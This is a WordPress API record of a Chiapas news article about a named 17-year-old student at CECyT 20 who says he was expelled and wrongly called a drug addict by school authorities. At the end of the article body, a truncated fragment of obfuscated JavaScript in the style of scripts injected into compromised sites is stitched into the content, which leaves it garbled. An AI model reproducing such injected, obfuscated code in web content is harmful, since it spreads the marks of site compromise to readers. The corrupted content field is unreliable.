{"id":5475,"date":"2022-09-28T03:28:39","date_gmt":"2022-09-28T03:28:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5475"},"modified":"2022-09-28T03:28:39","modified_gmt":"2022-09-28T03:28:39","slug":"senalan-a-estudiante-del-cecyt-20-por-uso-de-drogas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5475","title":{"rendered":"Se\u00f1alan a estudiante del CECYT 20 por uso de drogas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"449\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-27-at-11.08.16-AM-1024x449.jpeg\" alt=\"\" class=\"wp-image-5476\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-27-at-11.08.16-AM-1024x449.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-27-at-11.08.16-AM-300x132.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-27-at-11.08.16-AM-768x337.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-27-at-11.08.16-AM-1536x674.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-27-at-11.08.16-AM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- El estudiante del tercer semestre del Colegio de Estudios Cient\u00edficos y Tecnol\u00f3gicos del estado de Chiapas (CECyT) n\u00famero 20 de San Crist\u00f3bal, Jes\u00fas Rodolfo Vera Clara, exigi\u00f3 a la Subdirectora Elyana Hern\u00e1ndez Ballinas, le compruebe a trav\u00e9s de un Antidoping, los se\u00f1alamientos que hizo a su persona al argumentar que era un \u201cdrogadicto\u201d.<\/p>\n\n\n\n<p>En entrevista, explic\u00f3 que sin ser escuchado su argumento en su defensa por una pelea que tuvo con otro compa\u00f1ero, fue expulsado del plantel, siendo se\u00f1alado por la subdirectora, de ser \u201cun drogadicto, un delincuente, y quiero que me comprueben eso, y es injusto por la forma en que me expulsaron desde el pasado viernes\u201d.<\/p>\n\n\n\n<p>\u201cDecid\u00ed tomar esta decisi\u00f3n porque no se me hace justo que me hayan hecho esto, no he podido hablar con el director, me dijeron que no puedo ingresar al plantel porque estoy expulsado por cosas que no hice, exijo a las autoridades que me la seguridad, porque al igual muchos de mis amigos que los est\u00e1n siguiendo por la culpa del ni\u00f1o que me expulsaron, por ese ni\u00f1o he tenido muchos problemas, yo trabajo y estudio, solvento mis gastos, viajo todos los d\u00edas para venir desde Rancho Nuevo\u201d, dijo.<\/p>\n\n\n\n<p>Por algunos momentos, el estudiante de Mecatr\u00f3nica, se declar\u00f3 en huelga en tanto no era atendido, sin embargo minutos despu\u00e9s se retir\u00f3, desconoci\u00e9ndose si fue atendido por las autoridades educativas, ya que intentaba hablar con el Director Francisco Javier Garc\u00eda V\u00e1zquez, quien le mencion\u00f3 que le hiciera como quisiera pero que ya estaba expulsado.<\/p>\n\n\n\n<p>El joven de 17 a\u00f1os de edad argument\u00f3 sus ganas por salir adelante y la prueba es que \u00e9l trabaja y estudia, cubriendo los 300 pesos de inscripci\u00f3n, gastos en uniformes, libros, libretas y material did\u00e1ctico que le solicitan.<\/p>\n\n\n\n<p>Hizo un llamado a la Comisi\u00f3n Nacional y Estatal de los Derechos Humanos (CEDH-CNDH) por los se\u00f1alamientos de discriminaci\u00f3n y racismo con el que se conducen las autoridades educativas a su personas, sin investigar a fondo de la situaci\u00f3n.<\/p>\n\n\n\n<p>Pide se le practique un antidoping para descartar lo dicho por&nbsp; la Subdirectora y se le repare el da\u00f1o que le gener\u00f3 su expulsi\u00f3n sin darle la garant\u00eda de audiencia y dej\u00e1ndolo en total indefensi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- El estudiante del tercer semestre del Colegio de Estudios Cient\u00edficos y Tecnol\u00f3gicos del estado de Chiapas (CECyT) n\u00famero 20 de San Crist\u00f3bal, Jes\u00fas Rodolfo Vera Clara, exigi\u00f3 a la Subdirectora Elyana Hern\u00e1ndez Ballinas, le compruebe a trav\u00e9s de un Antidoping, los se\u00f1alamientos que hizo a su persona al &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5476,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5475","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5475","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5475"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5475\/revisions"}],"predecessor-version":[{"id":5477,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5475\/revisions\/5477"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5476"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5475"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5475"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5475"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}